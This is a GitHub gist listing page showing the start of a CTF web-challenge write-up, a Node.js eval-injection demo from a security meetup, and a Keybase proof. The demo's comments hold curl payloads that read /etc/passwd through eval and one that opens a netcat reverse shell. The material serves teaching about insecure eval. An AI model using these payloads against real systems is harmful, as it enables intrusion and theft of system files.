Skip to content

Instantly share code, notes, and snippets.

Renato Rodrigues Simpsonpt

Block or report user

Report or block Simpsonpt

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@Simpsonpt
Simpsonpt / h1-702-2018.md
Last active Mar 20, 2019
H1-702-CTF Write-up.
View h1-702-2018.md

During the C-Days18 conference André (@0xACB) and Zé (@JLLiS) CTF junkies teased me to participate in H1CTF18. At first, I wasn't entirely convinced since it had already been running for a few days. Nevertheless, I decided to have a crack at it.

The web challenge starts with a simple visit to an endpoint on http://159.203.178.9/ that is running a webpage with the following title "Notes RPC Capture The Flag" and in the body " ...somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden."

Without a shadow of a doubt; I must find a way to interact with that note service.

1 - Recon Phase

As always recon is the first thing to do. I started with the browser. After opening the page, I turned to the network tab on the Developer Tools and went through to the response headers, where I got "Apache/2.4.18 (Ubuntu)".

My first attempt was looking for "/server-status/" since the ([status

@Simpsonpt
Simpsonpt / nodejs-ssjs-nodebleed.js
Created Mar 11, 2016
Demo from 0xOPOSEC Meetup - Node.js Problems in Paradise - http://slides.com/simpson/njs-problems-in-paradise
View nodejs-ssjs-nodebleed.js
/**
* NodeBleed Original Bug: https://github.com/nodejs/node/issues/4660
* PoC: $ node nodejs-ssjs-nodebleed.js
* "Attack":
* - Direct Eval: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))"
* - JSON Abuse: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":"1000",\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}"
* - NodeBleed: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":1000,\"injection\":\"\"}" | hexdump -C
*
* Insecure evals Payloads:
* - --data "{\"str\": \"1000\",\"injection\":\"require('child_process').exec('netcat -e /bin/sh IP 9999')\"}" ($ netcat -l -p 9999)
View keybase.md

Keybase proof

I hereby claim:

  • I am simpsonpt on github.
  • I am simpson (https://keybase.io/simpson) on keybase.
  • I have a public key whose fingerprint is B26B 73BB 59DD E5A8 61C8 F93F 2891 9723 6299 DBBE

To claim this, I am signing this object:

You can’t perform that action at this time.